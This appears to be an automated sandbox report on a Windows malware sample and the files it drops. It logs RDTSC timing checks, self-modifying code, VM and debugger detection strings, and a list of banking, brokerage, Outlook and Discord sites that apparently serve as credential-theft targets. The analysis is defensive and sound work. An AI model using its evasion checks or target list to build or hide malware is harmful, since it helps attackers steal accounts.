                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D11509 second address: D1150D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D1150D second address: D11511 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D11511 second address: D11568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F8AF10CF434h 0x00000012 jp 00007F8AF10CF426h 0x00000018 jmp 00007F8AF10CF42Ch 0x0000001d jg 00007F8AF10CF426h 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push edi 0x00000029 pop edi 0x0000002a pushad 0x0000002b popad 0x0000002c push edx 0x0000002d pop edx 0x0000002e popad 0x0000002f jo 00007F8AF10CF432h 0x00000035 jg 00007F8AF10CF426h 0x0000003b jbe 00007F8AF10CF426h 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D11D91 second address: D11D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D11D99 second address: D11D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D142A0 second address: D142C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F8AF15A7F69h 0x0000000c push eax 0x0000000d push edx 0x0000000e jnc 00007F8AF15A7F56h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D142C8 second address: D142E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF10CF438h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D142E6 second address: D142EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D19A57 second address: D19A7B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F8AF10CF426h 0x00000008 ja 00007F8AF10CF426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 jl 00007F8AF10CF426h 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b push ebx 0x0000001c pop ebx 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 push edi 0x00000023 pop edi 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D1FF22 second address: D1FF36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jbe 00007F8AF15A7F56h 0x00000009 jnc 00007F8AF15A7F56h 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D2AA51 second address: D2AA5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D3225B second address: D3227E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F61h 0x00000007 jnp 00007F8AF15A7F56h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ecx 0x00000010 je 00007F8AF15A7F56h 0x00000016 pop ecx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D39C5D second address: D39C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D39C63 second address: D39C67 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D3FA05 second address: D3FA0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C45679 second address: C4567F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D42D55 second address: D42D62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jc 00007F8AF10CF426h 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D472AD second address: D472B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D47652 second address: D4765C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F8AF10CF42Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D47AC4 second address: D47AFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F8AF15A7F67h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F8AF15A7F66h 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D486F8 second address: D48719 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF10CF42Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F8AF10CF431h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D4B1E2 second address: D4B223 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jnl 00007F8AF15A7F6Fh 0x0000000d jmp 00007F8AF15A7F60h 0x00000012 popad 0x00000013 jng 00007F8AF15A7F78h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D4B3F5 second address: D4B3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D5056B second address: D505C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F62h 0x00000007 pushad 0x00000008 jne 00007F8AF15A7F56h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F8AF15A7F68h 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jl 00007F8AF15A7F7Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F8AF15A7F64h 0x00000025 jns 00007F8AF15A7F56h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D505C5 second address: D505C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D65988 second address: D65996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnc 00007F8AF15A7F56h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D65996 second address: D659A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D659A4 second address: D659A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D65B4F second address: D65B59 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8AF10CF426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6DA10 second address: D6DA16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6CDF7 second address: D6CE32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F8AF10CF426h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push esi 0x0000000f jmp 00007F8AF10CF42Dh 0x00000014 pop esi 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push ebx 0x00000018 jmp 00007F8AF10CF436h 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D6CC second address: D6D6E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007F8AF15A7F56h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F8AF15A7F5Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D6E9 second address: D6D6F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edi 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D6F5 second address: D6D6FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D6FE second address: D6D702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D702 second address: D6D721 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F8AF15A7F65h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D6D721 second address: D6D725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D7208C second address: D720AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 jmp 00007F8AF15A7F69h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D720AC second address: D720BC instructions: 0x00000000 rdtsc 0x00000002 je 00007F8AF10CF428h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D77734 second address: D7773A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D736EB second address: D736F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D736F2 second address: D736F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D721EC second address: D721F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D721F3 second address: D721F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D721F8 second address: D721FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D721FE second address: D7224F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8AF15A7F66h 0x0000000b popad 0x0000000c jmp 00007F8AF15A7F69h 0x00000011 pop edx 0x00000012 pop eax 0x00000013 pushad 0x00000014 push eax 0x00000015 push esi 0x00000016 pop esi 0x00000017 jnl 00007F8AF15A7F56h 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 jl 00007F8AF15A7F56h 0x00000026 jbe 00007F8AF15A7F56h 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D7224F second address: D72253 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D72253 second address: D72259 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D72398 second address: D723B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F8AF10CF426h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jng 00007F8AF10CF42Eh 0x00000015 jnc 00007F8AF10CF426h 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D72542 second address: D72559 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AF15A7F63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D72559 second address: D7255F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D7255F second address: D7256B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: D7256B second address: D72575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F8AF10CF426h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRDTSC instruction interceptor: First address: C8F1F1 second address: C8F1FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSpecial instruction interceptor: First address: AD9C8A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSpecial instruction interceptor: First address: C835D0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSpecial instruction interceptor: First address: C83971 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSpecial instruction interceptor: First address: AD74DA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\es5qBEFupj.exeSpecial instruction interceptor: First address: C81E6A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\es5qBEFupj.exeMemory allocated: 54A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeMemory allocated: 5670000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeMemory allocated: 7670000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\es5qBEFupj.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWindow / User API: threadDelayed 4832Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comAPI coverage: 3.8 %
                Source: C:\Users\user\Desktop\es5qBEFupj.exe TID: 3504Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.com TID: 8016Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\Set-up.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406301 FindFirstFileW,FindClose,7_2_00406301
                Source: C:\Users\user\AppData\Local\Temp\PasoCattle.exeCode function: 7_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406CC7
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_0011DC54
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_0012A087
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,21_2_0012A1E2
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,21_2_0011E472
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0012A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,21_2_0012A570
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000EC622 FindFirstFileExW,21_2_000EC622
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001266DC FindFirstFileW,FindNextFileW,FindClose,21_2_001266DC
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_00127333 FindFirstFileW,FindClose,21_2_00127333
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_001273D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,21_2_001273D4
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_0011D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,21_2_0011D921
                Source: C:\Users\user\AppData\Local\Temp\768400\Climb.comCode function: 21_2_000B5FC8 GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,21_2_000B5FC8
                Source: C:\Users\user\Desktop\es5qBEFupj.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\768400Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\768400\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Temp\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Local\Jump to behavior
                Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user~1\AppData\Jump to behavior
                Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000002.1322469608.0000000000C64000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: es5qBEFupj.exeBinary or memory string: `HGfS{
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: Set-up.exe, Climb.com, 00000015.00000002.2508538313.00000000010ED000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 00000015.00000002.2508841125.0000000001158000.00000004.00000020.00020000.00000000.sdmp, Climb.com, 00000015.00000003.2332004575.0000000001155000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: es5qBEFupj.exe, es5qBEFupj.exe, 00000000.00000003.1280366142.0000000005300000.00000004.00001000.00020000.00000000.sdmp, es5qBEFupj.exe, 00000000.00000002.1321366859.0000000000342000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: DetectVirtualMachine
                Source: Set-up.exe.0.drBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
                Source: Set-up.exe, 00000008.00000003.1320991634.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFsion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}00000FF1CE}\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-0000-0000000FF1CE}
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Climb.com, 00000015.00000003.1602150368.0000000003A23000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: Set-up.exe, 00000008.00000003.1320040104.00000000012B4000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524058618.00000000012FA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524589542.000000000131A000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000002.1527115823.000000000131B000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000008.00000003.1524131578.0000000001308000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: Set-up.exe.0.drBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
                Source: Climb.com, 00000015.00000003.1602245784.000000000393A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
